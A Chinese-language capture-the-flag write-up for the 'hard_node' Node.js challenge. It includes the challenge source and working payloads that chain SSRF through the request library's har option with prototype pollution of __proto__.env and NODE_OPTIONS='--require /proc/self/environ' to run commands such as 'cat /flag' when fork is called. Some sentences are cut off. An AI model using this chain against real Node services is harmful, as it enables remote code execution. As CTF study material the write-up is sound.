从8.0 开始支持 NODE_OPTIONS
,而 Node
的参数中有一项名为 --require
,可以加载执行一段 JavaScript
当 NODE_OPTIONS 遇到 fork
我们先来看一下 child_process.fork
function fork(modulePath /* , args, options */) { validateString(modulePath, 'modulePath'); // Get options and args arguments. let execArgv; let options = {}; let args = []; let pos = 1; if (pos < arguments.length && ArrayIsArray(arguments[pos])) { args = arguments[pos++]; } if (pos < arguments.length && (arguments[pos] === undefined || arguments[pos] === null)) { pos++; } if (pos < arguments.length && arguments[pos] != null) { if (typeof arguments[pos] !== 'object') { throw new ERR_INVALID_ARG_VALUE(`arguments[${pos}]`, arguments[pos]); } options = { ...arguments[pos++] }; } // Prepare arguments for fork: execArgv = options.execArgv || process.execArgv; if (execArgv === process.execArgv && process._eval != null) { const index = execArgv.lastIndexOf(process._eval); if (index > 0) { // Remove the -e switch to avoid fork bombing ourselves. execArgv = execArgv.slice(); execArgv.splice(index - 1, 2); } } args = execArgv.concat([modulePath], args); if (typeof options.stdio === 'string') { options.stdio = stdioStringToArray(options.stdio, 'ipc'); } else if (!ArrayIsArray(options.stdio)) { // Use a separate fd=3 for the IPC channel. Inherit stdin, stdout, // and stderr from the parent if silent isn't set. options.stdio = stdioStringToArray( options.silent ? 'pipe' : 'inherit', 'ipc'); } else if (!options.stdio.includes('ipc')) { throw new ERR_CHILD_PROCESS_IPC_REQUIRED('options.stdio'); } options.execPath = options.execPath || process.execPath; = false; return spawn(options.execPath, args, options); }
看到第 52 行。当 options
中没有 execPath
会尝试使用 process.execPath
,也就是 node
本身。如果我们还可以控制 options.env
,那就可以在 fork
原型链注入是老生长谈的 Node
安全漏洞了。这次,我们需要通过它写入 env
,以在 fork
通过注入 __proto__.env
{ "NODE_OPTIONS": "--require path/to/file.js" }
我们就可以执行对应的 JavaScript
通过 /proc/self/environ
,我们可以读取当前的环境变量。于是,我们就可以通过将代码写到环境变量里,达到执行任意代码的目的。我们将上面的 payload
{ "AAAA": "console.log("2333")//", "NODE_OPTIONS": "--require /proc/self/environ" }
就可以在 fork
之前向控制台打印出 2333 了。这里的 AAAA
是为了让这条环境变量在 /proc/self/environ
中能显示在最前,而后面的 //
和 //
这题据 CTFHub 说是 2020 第五空间决赛的 Web 题,名字是 hard_node,在 CTFHub 上可以找到。但 CTFHub 上没给源码,所以这里附一下源码。
// app.js const express = require('express'); const bodyParser = require('body-parser'); const proc = require('child_process'); const request = require('request'); const ip = require("ip"); const manage = require("./manage.js"); const path = require('path'); const app = express(); app.use(bodyParser.urlencoded({ extended: true })); app.use(bodyParser.json()); app.use(express.static(path.join(__dirname, 'public'))); //stop hackers const disallowedKeys = [ '__proto__', 'prototype', 'constructor', 'eval','proccess','root','global','exec','!','fs' ]; function isValidPath(segment){ disallowedKeys.forEach(evilWord => { if(segment.toString().indexOf(evilWord)!==-1){ return false } }); return true; }'/add', (req, res) => { let ip = req.ip; console.log(ip.m); if (ip.substr(0, 7) == "::ffff:") { ip = ip.substr(7) } console.log(`method:${req.method},serverip:${server_ip},ip:${ip}`); if (ip != '' && ip != server_ip) { res.status(403).send('Not Edit from Local!'); }else{ if(req.body.userName && req.body.nameVal){ let username = req.body.userName; let nameVal = req.body.nameVal; if (!isValidPath(username) || !isValidPath(nameVal)) { username = 'username'; nameVal = 'guest'; } manage.set(object, username, nameVal); console.log(ip.k); console.log(object); res.send(` <h1>Edit Success</h1> <a href="/admin">View Admin Page</a>`) }else{ res.send('param error'); } } }); app.get('/admin',(req,res)=>{ if(manage.get(object,'username','guest') === 'admin'){ console.log('Current User:'+object.username) const child = proc.fork(`${__dirname}/public/user.js`,['admin']); child.on('message', (body) => { res.status(200).send(body); }); child.on('close', (code, signal) => { console.log(`subproccess ended with ${signal}`); }); }else{ res.status(403).send('Only Admin Can View this'); } }) app.get('/getContent',(req,res)=>{ res.sendfile(`${__dirname}/public/guest.html`); }) app.get('/', (req,res) => { // console.log(req.body) let uri = req.query.url? req.query.url: ''; console.log(uri) try{ request.get(uri,(err,response,data)=>{ if (!err && response.statusCode == 200) { res.send(data); }else{ console.log(err); } }) }catch(e){ console.log(e); }finally{ console.log('Make Server Continue Running'); } }); var object = {username:'guest'}; var server_ip = ip.address(); app.listen(3002); console.log(`${server_ip} is starting at port 3000`)
// manage.js const isObj = require('is-obj'); var manage = { getPathSegments: function(path) { const pathArray = path.split('.'); const parts = []; for (let i = 0; i < pathArray.length; i++) { let p = pathArray[i]; while (p[p.length - 1] === '\\' && pathArray[i + 1] !== undefined) { p = p.slice(0, -1); p += pathArray[++i]; } parts.push(p); } return parts; }, get: function(object, path, value) { if (!isObj(object) || typeof path !== 'string') { return value === undefined ? object : value; } const pathArray = this.getPathSegments(path); for (let i = 0; i < pathArray.length; i++) { if (!, pathArray[i])) { return value; } object = object[pathArray[i]]; if (object === undefined || object === null) { if (i !== pathArray.length - 1) { return value; } break; } } return object; }, set: function(object, path, value) { Object.keys(Object.prototype).forEach(function(Val){ if(!Object.hasOwnProperty(Val)){ delete Object.prototype[Val]; console.log(`${Val} is delete`); } }) if (!isObj(object) || typeof path !== 'string') { return object; } const root = object; const pathArray = this.getPathSegments(path); for (let i = 0; i < pathArray.length; i++) { const p = pathArray[i]; if (!isObj(object[p])) { object[p] = {}; } if (i === pathArray.length - 1) { object[p] = value; } object = object[p]; } return root; } } module.exports = manage
中 set
存在明显的原型链注入,而通过 getPathSegments
又可以以 \\.
我们发现,修改信息只能通过 /add
进行,这里有一个内网限定访问,可以使用 request
的 har
http --follow --timeout 3600 GET 'url[har][method]'=='POST' 'url[har][url]'=='' 'url[har][postData]'=='{"userName": "username", "nameVal": "admin"}' 'url[har][postData][mimeType]'=='application/json'
http --follow --timeout 3600 GET 'url[har][method]'=='POST' 'url[har][url]'=='' 'url[har][postData]'=='{"userName": "__pr\\\\.oto__.env", "nameVal": {"A": "process.send(require('\''child_process'\'').execSync('\''cat /flag'\''))//", "NODE_OPTIONS": "--require /proc/self/environ"}}' 'url[har][postData][mimeType]'=='application/json'
最后访问 /admin
(最后从 CTFHub 上把源码偷下来了: